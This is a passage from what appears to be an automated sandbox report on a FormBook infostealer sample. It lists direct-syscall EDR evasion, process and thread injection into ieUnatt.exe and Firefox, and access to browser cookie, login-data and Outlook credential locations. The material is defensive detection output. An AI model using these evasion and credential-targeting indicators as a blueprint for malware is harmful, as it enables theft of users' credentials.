                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8BF0 mov eax, dword ptr fs:[00000030h]5_2_018D8BF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8BF0 mov eax, dword ptr fs:[00000030h]5_2_018D8BF0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194EB1D mov eax, dword ptr fs:[00000030h]5_2_0194EB1D
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FEB20 mov eax, dword ptr fs:[00000030h]5_2_018FEB20
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FEB20 mov eax, dword ptr fs:[00000030h]5_2_018FEB20
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01998B28 mov eax, dword ptr fs:[00000030h]5_2_01998B28
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01998B28 mov eax, dword ptr fs:[00000030h]5_2_01998B28
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197EB50 mov eax, dword ptr fs:[00000030h]5_2_0197EB50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01984B4B mov eax, dword ptr fs:[00000030h]5_2_01984B4B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01984B4B mov eax, dword ptr fs:[00000030h]5_2_01984B4B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01978B42 mov eax, dword ptr fs:[00000030h]5_2_01978B42
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01966B40 mov eax, dword ptr fs:[00000030h]5_2_01966B40
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01966B40 mov eax, dword ptr fs:[00000030h]5_2_01966B40
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0199AB40 mov eax, dword ptr fs:[00000030h]5_2_0199AB40
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018CCB7E mov eax, dword ptr fs:[00000030h]5_2_018CCB7E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01908A90 mov edx, dword ptr fs:[00000030h]5_2_01908A90
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018DEA80 mov eax, dword ptr fs:[00000030h]5_2_018DEA80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4A80 mov eax, dword ptr fs:[00000030h]5_2_019A4A80
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8AA0 mov eax, dword ptr fs:[00000030h]5_2_018D8AA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D8AA0 mov eax, dword ptr fs:[00000030h]5_2_018D8AA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01926AA4 mov eax, dword ptr fs:[00000030h]5_2_01926AA4
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01904AD0 mov eax, dword ptr fs:[00000030h]5_2_01904AD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01904AD0 mov eax, dword ptr fs:[00000030h]5_2_01904AD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D0AD0 mov eax, dword ptr fs:[00000030h]5_2_018D0AD0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01926ACC mov eax, dword ptr fs:[00000030h]5_2_01926ACC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01926ACC mov eax, dword ptr fs:[00000030h]5_2_01926ACC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01926ACC mov eax, dword ptr fs:[00000030h]5_2_01926ACC
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190AAEE mov eax, dword ptr fs:[00000030h]5_2_0190AAEE
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190AAEE mov eax, dword ptr fs:[00000030h]5_2_0190AAEE
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0195CA11 mov eax, dword ptr fs:[00000030h]5_2_0195CA11
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018FEA2E mov eax, dword ptr fs:[00000030h]5_2_018FEA2E
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CA38 mov eax, dword ptr fs:[00000030h]5_2_0190CA38
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CA24 mov eax, dword ptr fs:[00000030h]5_2_0190CA24
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F4A35 mov eax, dword ptr fs:[00000030h]5_2_018F4A35
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F4A35 mov eax, dword ptr fs:[00000030h]5_2_018F4A35
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0A5B mov eax, dword ptr fs:[00000030h]5_2_018E0A5B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018E0A5B mov eax, dword ptr fs:[00000030h]5_2_018E0A5B
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6A50 mov eax, dword ptr fs:[00000030h]5_2_018D6A50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6A50 mov eax, dword ptr fs:[00000030h]5_2_018D6A50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6A50 mov eax, dword ptr fs:[00000030h]5_2_018D6A50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6A50 mov eax, dword ptr fs:[00000030h]5_2_018D6A50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6A50 mov eax, dword ptr fs:[00000030h]5_2_018D6A50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6A50 mov eax, dword ptr fs:[00000030h]5_2_018D6A50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018D6A50 mov eax, dword ptr fs:[00000030h]5_2_018D6A50
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194CA72 mov eax, dword ptr fs:[00000030h]5_2_0194CA72
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0194CA72 mov eax, dword ptr fs:[00000030h]5_2_0194CA72
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0197EA60 mov eax, dword ptr fs:[00000030h]5_2_0197EA60
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CA6F mov eax, dword ptr fs:[00000030h]5_2_0190CA6F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CA6F mov eax, dword ptr fs:[00000030h]5_2_0190CA6F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CA6F mov eax, dword ptr fs:[00000030h]5_2_0190CA6F
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CDB1 mov ecx, dword ptr fs:[00000030h]5_2_0190CDB1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CDB1 mov eax, dword ptr fs:[00000030h]5_2_0190CDB1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_0190CDB1 mov eax, dword ptr fs:[00000030h]5_2_0190CDB1
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F8DBF mov eax, dword ptr fs:[00000030h]5_2_018F8DBF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_018F8DBF mov eax, dword ptr fs:[00000030h]5_2_018F8DBF
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01906DA0 mov eax, dword ptr fs:[00000030h]5_2_01906DA0
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01998DAE mov eax, dword ptr fs:[00000030h]5_2_01998DAE
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_01998DAE mov eax, dword ptr fs:[00000030h]5_2_01998DAE
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeCode function: 5_2_019A4DAD mov eax, dword ptr fs:[00000030h]5_2_019A4DAD
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtResumeThread: Direct from: 0x773836ACJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtMapViewOfSection: Direct from: 0x77382D1CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtWriteVirtualMemory: Direct from: 0x77382E3CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtProtectVirtualMemory: Direct from: 0x77382F9CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtSetInformationThread: Direct from: 0x773763F9Jump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtCreateMutant: Direct from: 0x773835CCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtNotifyChangeKey: Direct from: 0x77383C2CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeNtProtectVirtualMemory: Direct from: 0x77377B2EJump to behavior
                Injects a PE file into a foreign processes
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeMemory written: C:\Users\user\Desktop\NFhRxwbegd.exe base: 400000 value starts with: 4D5AJump to behavior
                Maps a DLL or memory area into another process
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: NULL target: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeSection loaded: NULL target: C:\Windows\SysWOW64\ieUnatt.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread register set: target process: 5024Jump to behavior
                Queues an APC in another process (thread injection)
                Source: C:\Windows\SysWOW64\ieUnatt.exeThread APC queued: target process: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeProcess created: C:\Users\user\Desktop\NFhRxwbegd.exe "C:\Users\user\Desktop\NFhRxwbegd.exe"Jump to behavior
                Source: C:\Program Files (x86)\XNaYQXrcWtFexcmEUWgDtuCcVUokBjTYajsfCkBEWjtAdXRMDcBnpZPrDyOrEUpoJrpHkfWYekajW\gsolWhsjddFW.exeProcess created: C:\Windows\SysWOW64\ieUnatt.exe "C:\Windows\SysWOW64\ieUnatt.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: gsolWhsjddFW.exe, 00000007.00000000.2473399494.00000000014B0000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000007.00000002.4083532896.00000000014B1000.00000002.00000001.00040000.00000000.sdmp, gsolWhsjddFW.exe, 00000009.00000002.4084784385.00000000014F1000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeQueries volume information: C:\Users\user\Desktop\NFhRxwbegd.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\NFhRxwbegd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4085165315.0000000004F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Tries to harvest and steal browser information (history, passwords, etc)
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\ieUnatt.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Tries to steal Mail credentials (via file / registry access)
                Source: C:\Windows\SysWOW64\ieUnatt.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 5.2.NFhRxwbegd.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000008.00000002.4085031615.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2561213396.0000000001830000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2560447934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000007.00000002.4084033538.0000000003570000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.4087823404.00000000052A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.4082243589.0000000002F60000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000005.00000002.2562570319.00000000026F0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
